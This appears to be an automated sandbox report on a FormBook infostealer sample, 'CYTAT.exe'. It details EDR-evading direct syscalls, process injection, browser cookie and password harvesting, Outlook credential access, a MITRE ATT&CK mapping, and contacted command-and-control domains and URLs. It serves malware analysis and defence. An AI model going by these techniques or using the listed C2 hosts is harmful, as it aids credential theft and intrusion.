            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 7800Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\CYTAT.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2A76008Jump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\CYTAT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CYTAT.exe"Jump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: CYTAT.exe, eMNaOgRkIZi.exe, 0000000A.00000000.1395133969.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000002.3105339658.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106037220.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: eMNaOgRkIZi.exe, 0000000A.00000000.1395133969.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000002.3105339658.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106037220.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: eMNaOgRkIZi.exe, 0000000A.00000000.1395133969.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000002.3105339658.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106037220.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: eMNaOgRkIZi.exe, 0000000A.00000000.1395133969.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000002.3105339658.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106037220.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: CYTAT.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: CYTAT.exeBinary or memory string: WIN_XP
            Source: CYTAT.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: CYTAT.exeBinary or memory string: WIN_XPe
            Source: CYTAT.exeBinary or memory string: WIN_VISTA
            Source: CYTAT.exeBinary or memory string: WIN_7
            Source: CYTAT.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518075 Sample: CYTAT.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 28 www.woshop.online 2->28 30 www.tekilla.wtf 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 5 other signatures 2->48 10 CYTAT.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 eMNaOgRkIZi.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 eMNaOgRkIZi.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.kexweb.top 63.250.47.40, 52120, 52121, 52122 NAMECHEAP-NETUS United States 22->34 36 bola88site.one 172.96.191.39, 52112, 52113, 52114 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada 22->36 38 7 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            CYTAT.exe26%ReversingLabs
            CYTAT.exe100%AviraHEUR/AGEN.1321671
            CYTAT.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.languagemodel.pro/nxfn/0%Avira URL Cloudsafe
            http://www.kexweb.top/3bdq/0%Avira URL Cloudsafe
            http://www.dyme.tech/h7lb/0%Avira URL Cloudsafe
            http://www.mizuquan.top0%Avira URL Cloudsafe
            http://www.jobworklanka.online/ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uJuIaoF4jHIQUSYKPYHcUgvqmMBPmFsZ+bgj1yNrVQypjRbF20O0Zy390%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU100%Avira URL Cloudmalware
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
